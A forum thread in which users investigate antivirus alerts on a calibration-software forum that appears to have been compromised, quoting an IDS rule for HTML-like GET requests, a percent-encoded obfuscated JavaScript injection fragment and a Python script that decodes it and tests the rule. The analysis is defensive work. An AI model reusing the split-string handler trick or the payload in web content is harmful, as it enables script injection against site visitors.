False Trojan malware web reset when loading web page with zip attachments?

I get a Trojan malware web reset when loading web pages on the Spectracal forum website, on any page that has zip attachments. I frequent this forum and never had this problem; it started less than a day ago. Sample below:

http://consumer.spectracal.com/forum/viewtopic.php?f=95&t=4135

Anybody else experiencing this?

Can you take a Screenshot please?

That would be helpful.

Please edit the link to hxxp or wxw to break the link. :slight_smile:

The link looks clean on all website scanners that I ran.
Is this also happening without login?

The IP is identified as risky by Zulu: http://zulu.zscaler.com/submission/show/3a5ace773fcc6db39b590494cad074c5-1376510268

But that is all i can see here.

Would you like to have the site checked by a website analyst?

Hi Steven Winderlich

IDS alert for ETPRO WEB_CLIENT Microsoft Internet Explorer remote code execution via option element *
On this website 1 page has suspicious code

Firekeeper alert is for:

=== Triggered rule ===
alert(url_content:"%3C"; url_content:"%22"; url_content:"%3E"; msg:"Suspicious looking GET request containing %3C, %3E, and %22. Suspiciously HTML-like."; reference:url,http://ha.ckers.org/xss.html; reference:url,http://en.wikipedia.org/wiki/Cross-site_scripting;)

=== Request URL ===
htxp://www.google.com/search?q=0%5D%7D%3Bfunction+s%28%29%7B+a.P%28r%29%3Bf%5Bz%5D%28r%29%7Df.addEventListener%3Ff.addEventListener%28r%2Cs%2Cfalse%29%3Af.attachEvent%28%22on%22%2Br%2Cs%29%3Bvar+ld%3Dfunction%28%29%7Bfunction+p%28hd%29%7B+hd%3D%22head%22%3Breturn%5B%22%3C%22%2Chd%2C%22%3E%3C%2F%22%2Chd%2C%22%3E%3C%22%2Ci%2C%27+onl%27+%2B+%27oad%3D%22var+d%3D%27%2Cg%2C%22%3Bd.getElementsByTagName%28%27head%27%29%5B0%5D.%22%2C&client=flock&channel=fds&oe=utf-8&oq=0%5D%7D%3Bfunction+s%28%29%7B+a.P%28r%29%3Bf%5Bz%5D%28r%29%7Df.addEventListener%3Ff.addEventListener%28r%2Cs%2Cfalse%29%3Af.attachEvent%28%22on%22%2Br%2Cs%29%3Bvar+ld%3Dfunction%28%29%7Bfunction+p%28hd%29%7B+hd%3D%22head%22%3Breturn%5B%22%3C%22%2Chd%2C%22%3E%3C%2F%22%2Chd%2C%22%3E%3C%22%2Ci%2C%27+onl%27+%2B+%27oad%3D%22var+d%3D%27%2Cg%2C%22%3Bd.getElementsByTagName%28%27head%27%29%5B0%5D.%22%2C&gs_l=heirloom-serp.12…168869.173826.0.189025.41.14.0.0.0.7.416.1858.1j7j2j0j1.11.0…0…1ac.1j2.24.heirloom-serp…39.2.225.JuQszQRyOMk

Decoded script (complex functions, environment):

  // Fragment of the decoded handler; a, P, r, f and z are not defined in this fragment
  function s() {
    a.P(r);
    f[z](r);
  }
  • Available. remote exploit. alias conficker worm like…

pol

So this must be removed and then it should be OK.
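To make the Firekeeper alert above reproducible, here is an added example (not code from the thread, from Firekeeper or from Zulu) that applies an approximation of the quoted rule to the raw request URL, URL-decodes the q parameter, and then folds split string literals such as ' onl' + 'oad' so that the obfuscated event handler becomes visible. The sample URLs are constructed: the first is the defanged request from the thread shortened to its q parameter (the "htxp" scheme is kept as posted), the other two are made up to show a benign search and a search that trips the rule without carrying a handler.

```python
"""Decode a suspicious GET request and apply a Firekeeper-style check to it.

Added example for this thread; the rule is an approximation of the quoted
Firekeeper signature, not Firekeeper's own matching code.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed samples. SUSPICIOUS_URL is the defanged request from the thread,
# cut down to the q parameter; the other two are invented for contrast.
SUSPICIOUS_URL = (
    "htxp://www.google.com/search?q=0%5D%7D%3Bfunction+s%28%29%7B+a.P%28r%29"
    "%3Bf%5Bz%5D%28r%29%7Df.addEventListener%3Ff.addEventListener%28r%2Cs%2C"
    "false%29%3Af.attachEvent%28%22on%22%2Br%2Cs%29%3Bvar+ld%3Dfunction%28%29"
    "%7Bfunction+p%28hd%29%7B+hd%3D%22head%22%3Breturn%5B%22%3C%22%2Chd%2C%22"
    "%3E%3C%2F%22%2Chd%2C%22%3E%3C%22%2Ci%2C%27+onl%27+%2B+%27oad%3D%22var+d"
    "%3D%27%2Cg%2C%22%3Bd.getElementsByTagName%28%27head%27%29%5B0%5D.%22%2C"
    "&client=flock&channel=fds&oe=utf-8"
)
BENIGN_URL = "htxp://www.google.com/search?q=spectracal+forum&oe=utf-8"
# A user searching for literal markup also trips the rule (false positive).
HTML_SEARCH_URL = "htxp://www.google.com/search?q=%3Cdiv%3E+%22hello%22"

# The three percent-encoded characters the rule requires: <  >  "
HTMLISH_TOKENS = ("%3C", "%3E", "%22")

# 'abc' + 'def'  ->  'abcdef' (quote style of the first literal is kept)
_CONCAT = re.compile(r"""(['"])(.*?)\1\s*\+\s*(['"])(.*?)\3""")
# on<something>=  i.e. an inline event-handler attribute
_HANDLER = re.compile(r"\bon\w+(?=\s*=)", re.IGNORECASE)


def firekeeper_rule_matches(url: str) -> bool:
    """Alert when the raw URL carries all three encoded tokens (case-insensitive)."""
    raw = url.upper()
    return all(tok in raw for tok in HTMLISH_TOKENS)


def decode_query_param(url: str, name: str = "q") -> str:
    """Return the URL-decoded value of one query parameter ('' if absent)."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(name)
    return values[0] if values else ""


def fold_string_concat(js: str) -> str:
    """Join adjacent string literals glued with '+' until nothing changes."""
    while True:
        folded = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), js)
        if folded == js:
            return folded
        js = folded


def analyze(url: str) -> dict:
    """Run the rule, decode q, fold literals and list the handlers that appear."""
    decoded = decode_query_param(url)
    folded = fold_string_concat(decoded)
    return {
        "rule_match": firekeeper_rule_matches(url),
        "decoded": decoded,
        "folded": folded,
        "handlers": _HANDLER.findall(folded),
    }


if __name__ == "__main__":
    for label, url in (("thread", SUSPICIOUS_URL), ("benign", BENIGN_URL), ("html search", HTML_SEARCH_URL)):
        result = analyze(url)
        print(f"{label}: rule={result['rule_match']} handlers={result['handlers']}")
        print("  decoded:", result["folded"][:120])
```

The point of the folding step is the caveat a practitioner wants here: the decoded payload never contains the literal string onload, only ' onl' + 'oad', so a signature keyed on the handler name would miss it, while the Firekeeper rule fires on the encoded angle brackets and quote alone and therefore also fires on any ordinary search for HTML text. The rule is a good first-stage trigger; deciding whether the request is hostile needs the decode.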

Thanks guys. Looks like somebody hacked the site with the infection. I tried the website just now and get a formal Spectracal page saying the board is not available, so they must be cleaning it up.